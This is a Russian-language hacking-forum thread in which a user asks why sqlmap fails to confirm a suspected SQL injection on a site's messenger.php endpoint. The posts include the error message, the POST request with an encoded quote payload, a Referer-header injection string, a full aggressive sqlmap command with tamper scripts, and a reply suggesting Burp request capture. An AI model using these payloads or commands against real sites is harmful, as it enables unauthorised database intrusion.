Старый 12.09.2018, 16:28   #1
hackworld
 
Регистрация: 12.09.2018
Сообщений: 2
Репутация: 0
По умолчанию Sqlmap не видит уязвимость

Sqlmap не видит уязвимость уже вроде все перепробывал

Query failed: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'NULL,'1\'\"','2018-09-11 22:46:00')' at line 4

POST /messenger/messenger.php
Host: test-site.com
last_message_id=%2527&message=3&limit=50

уязвимые параметры все три last_message_id,message,limit

Так же referer b user-agent
Referer: (select convert(int,cast(0x5f21403264696c656d6d61 as varchar(8000))) from syscolumns)

запрос sqlmap -u "https://test-site.com/messenger/messenger.php" --data="last_message_id=&message=3&limit=50" -p last_message_id --random-agent --level=5 --risk=3 --threads=10 --dbs

Пробывал и левел от 1-5 риск 1-3 тамперы пробывал apostrophenullencode.py charencode.py charunicodeencode.py space2mysqlblank.py unmagicquotes.py ничего не помогает не видит скулю и все причем во всех параметрах пишит ничего нет.

Какие еще запросы можно попробывать кто подскажет или это все false positive?
hackworld вне форума   Ответить с цитированием
Старый 13.09.2018, 08:28   #2
man474019
 
Регистрация: 18.02.2015
Сообщений: 49
Репутация: 0
По умолчанию

give http response with burp suite and do sqlmap -r file.txt (http response) --level=5 --risk=3
man474019 вне форума   Ответить с цитированием
Старый 14.09.2018, 23:21   #3
hackworld
 
Регистрация: 12.09.2018
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от man474019 Посмотреть сообщение
give http response with burp suite and do sqlmap -r file.txt (http response) --level=5 --risk=3
Делал в первую очередь не помогает
hackworld вне форума   Ответить с цитированием
Ответ

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2018, Jelsoft Enterprises Ltd. Перевод: zCarot